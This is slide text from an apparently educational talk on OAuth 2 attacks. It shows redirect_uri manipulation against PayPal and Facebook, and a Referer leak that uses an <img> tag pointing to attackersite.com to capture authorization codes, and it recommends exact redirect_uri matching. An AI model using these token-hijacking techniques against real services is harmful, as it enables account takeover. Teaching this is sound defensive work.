  • 51. www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED ★ #3 “Confused Deputy” aka “The Devil Wears Prada” * Image taken from the movie "The Devil Wears Prada"
  • 52. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home"
  • 53. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home”
  • 54. * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017
  • 55. * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html
  • 56. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2015 * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html
  • 57. * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html https://plus.google.com/app/basic/stream/z12wz30w5xekhjow504ch3vq4wi1gjzrd3w
  • 58. * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html GET /! Host: sanso.github.io! Referer: https://plus.google.com/app/basic/stream/ z12wz30w5xekhjow504ch3vq4wi1gjzrd3w /……/#access_token=3AAQ…!
  • 59. * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” The registered redirect_uri must be as specific as it can be.
  • 60. * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token #1 – Exploit the redirect URI aka “Lassie Come Home” GET /signin/authorize? response_type=code&client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHo o1Ap9ChOV0XqPdZXQt&scope=openid %20profile&state=cbdfgjd&redirect_uri=https%3A%2F%clientapp/callback/ paypal! Host: www.paypal.com!
  • 61. * Image taken from the movie “Lassie Come Home" #1 – Exploit the redirect URI aka “Lassie Come Home”
  • 62. * Image taken from the movie “Lassie Come Home" And then there is the Paypal way: if (redirect_uri.startsWith(“localhost”)) {! GO FOR IT ! ! !}! #1 – Exploit the redirect URI aka “Lassie Come Home”
  • 63. * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token #1 – Exploit the redirect URI aka “Lassie Come Home” GET /signin/authorize? response_type=code&client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHo o1Ap9ChOV0XqPdZXQt&scope=openid %20profile&state=cbdfgjd&redirect_uri=http:// localhost.intothesymmetry.com/! Host: www.paypal.com!
  • 64. * Image taken from the movie “Lassie Come Home" #1 – Exploit the redirect URI aka “Lassie Come Home” http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
  • 65. * Image taken from the movie “Lassie Come Home" The ONLY safe validation method for redirect_uri the authorization server should adopt is exact matching #1 – Exploit the redirect URI aka “Lassie Come Home”
  • 66. References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { http://oauth.net/articles/authentication/ { http://intothesymmetry.blogspot.ch/ { https://www.manning.com/books/oauth-2-in-action { @asanso
  • 68. ✔ ✔ ✗ ✗ ✗ ✗ ✗ * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔ #1 – Exploit the redirect URI aka “Lassie Come Home”
  • 69. 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔ #1 – Exploit the redirect URI aka “Lassie Come Home”
  • 70. 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! ! #1 – Exploit the redirect URI aka “Lassie Come Home”
  • 71. #1 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !

Notas do Editor

  1. Generic suggestions and reference attack
  2. VALLET KEY
  3. TOFU
  4. Origin is null
  5. Wesley Wineberg
  6. Wesley Wineberg
  7. logcat